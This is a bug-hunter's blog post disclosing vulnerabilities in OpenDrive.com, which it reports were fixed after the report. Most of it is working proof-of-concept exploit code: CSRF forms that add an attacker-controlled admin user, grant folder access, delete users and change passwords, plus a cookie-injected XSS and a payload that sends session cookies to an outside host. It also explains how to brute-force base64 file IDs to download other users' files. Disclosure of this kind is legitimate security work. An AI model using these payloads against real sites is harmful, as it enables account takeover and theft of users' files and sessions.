After a long time away from bug hunting, I randomly found these few bugs in the OpenDrive.com website.
XSRF in Creating Groups
If an attacker can get a logged-in user to run this code, he can create his own groups in the user's Users section. This is the proof of concept; you will see groups such as “pwned” being created.
[code language="html"]
<html>
<!-- Discovered by @OsandaMalith -->
<body>
<script>
// Cross-site POST to /ajax; withCredentials makes the browser attach the
// victim's OpenDrive session cookie to the forged request.
function submitRequest()
{
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://www.opendrive.com/ajax", true);
    xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
    xhr.withCredentials = true;
    var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
    <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
Complete Account Takeover XSRF
An attacker can completely take over the account of any user who runs the XSRF exploit in a browser while logged in.
Change the email in pwn.html to an email account you control; once the victim executes this code, that address is added as an access user with full admin rights 🙂 Next, execute GetFolders.html to get full permissions to the victim's folders.
The attacker can host these exploits on his server and make users run them. Please use CSRF tokens to fix this.
File: pwn.html
[code language="html"]
<html>
<!-- Discovered by @OsandaMalith -->
<body>
<form name="0day" action="https://www.opendrive.com/ajax" method="POST">
    <input type="hidden" name="action" value="create-accessuser" />
    <input type="hidden" name="access_first_name" value="Eve" />
    <input type="hidden" name="access_last_name" value="Haxor" />
    <input type="hidden" name="access_password" value="pwned" />
    <input type="hidden" name="access_email" value="youremail@yopmail.com" />
    <input type="hidden" name="access_admin_mode" value="1" />
    <input type="hidden" name="access_notification" value="0" />
    <input type="hidden" name="access_max_storage" value="5120" />
    <input type="hidden" name="access_bw_max" value="1024" />
    <input type="hidden" name="group_id" value="110701" />
    <input type="hidden" name="access_phone" value="123" />
    <input type="hidden" name="access_password_change" value="1" />
    <input type="hidden" name="access_position" value="Tester" />
    <input type="hidden" name="access_send_password" value="1" />
    <input type="submit" value="Click Here to Pwn an account" />
</form>
</body>
</html>
[/code]
Next we take control of all folders. You can clearly see that from the attacker's account we were able to access the “confidential.txt” file, which was inside the victim's account.
File: GetFolders.html
[code language="html"]
<html>
<!-- Discovered by @OsandaMalith -->
<body>
<form name="0day" action="https://www.opendrive.com/ajax" method="POST">
    <input type="hidden" name="action" value="set-folder-access" />
    <input type="hidden" name="access_email" value="haxor15@yopmail.com" />
    <input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
    <input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
    <input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
    <input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
    <input type="submit" value="Click Here to Pwn the Folders" />
</form>
</body>
</html>
[/code]
Here is a proof of concept video I made to demonstrate this.
Delete Account XSRF
Once a user has added another user to the users list, the delete action carries no XSRF token, so an attacker can arbitrarily delete the added user by specifying the email.
[code language="html"]
<html>
<body>
<form action="https://www.opendrive.com/ajax" method="POST">
    <input type="hidden" name="action" value="user-delete" />
    <input type="hidden" name="access_email" value="youremail@yopmail.com" />
    <input type="submit" value="Click Here to Delete" />
</form>
</body>
</html>
[/code]
Change Password
We can change the user's password with the following XSRF exploit.
[code language="html"]
<html>
<!-- Discovered by @OsandaMalith -->
<body>
<form action="https://www.opendrive.com/settings/profile" method="POST">
    <input type="hidden" name="_wpnonce" value="24ce7b505d" />
    <input type="hidden" name="user_info_old_password" value="OldPassword" />
    <input type="hidden" name="user_info_new_password" value="NewPassword" />
    <input type="hidden" name="user_info_repeat_password" value="NewPassword" />
    <input type="hidden" name="form_action" value="update_password" />
    <input type="submit" value="Change Password" />
</form>
</body>
</html>
[/code]
Cookie Based XSS
I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.
[code language="text"]
GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert('XSS by Osanda')">;
Connection: keep
[/code]
[code language="bash"]
curl -i -s -k -X 'GET' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0' \
  -b 'login_value="><svg/onload="alert(1337)">' \
  'http://admin.opendrive.com/login' | grep 1337
[/code]
We can steal the session cookies and get access to other accounts. The cookies are not marked HttpOnly, so script can read them, and they are not marked Secure either.
Here’s a demonstration of stealing the session cookie 🙂
[code language="html"]
<svg/onload=document.location='http://localhost:8000/?'+document.cookie>
[/code]
Weak Encoding
I noticed that we can easily brute-force files.
https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1
Base64 decoding OTZfMzA5NDU1Nl8= gives:
96_3094556_
We can brute-force these values, encode them back to base64 and download random files belonging to other users.
This attack is so nice. It's already fixed?
It was fixed right after report.